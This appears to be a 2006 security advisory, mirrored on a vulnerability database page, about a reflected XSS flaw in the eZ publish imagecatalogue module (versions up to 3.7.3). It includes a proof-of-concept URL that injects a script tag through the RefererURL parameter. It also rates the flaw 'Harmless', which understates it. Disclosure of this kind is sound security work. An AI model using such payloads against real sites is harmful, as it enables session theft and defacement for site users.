Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11599
HistoryFeb 26, 2006 - 12:00 a.m.

Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability

2006-02-2600:00:00
vulners.com
14

–Security Report–
Advisory: eZ publish <= 3.7.3 (imagecatalogue module) XSS vulnerability

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 25/02/06 01:43 PM

Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com
Web: http://www.nukedx.com
}

Vendor: eZ systems (http://www.ez.no)
Version: 3.7.3 and must be prior versions.
About: Via this method remote attacker can make malicious links for clicking and
when victim clicks this links victim's browser would be inject with XSS.
Level: Harmless

How&Example:
?ReferrerURL variable did not sanitized properly.
GET -> http://[site]/[ezdir]/imagecatalogue/imageview/475/?RefererURL=">[XSS]
EXAMPLE ->
http://[site]/[ezdir]/imagecatalogue/imageview/475/?RefererURL="><script>alert('X');</script><link%20href="

Timeline: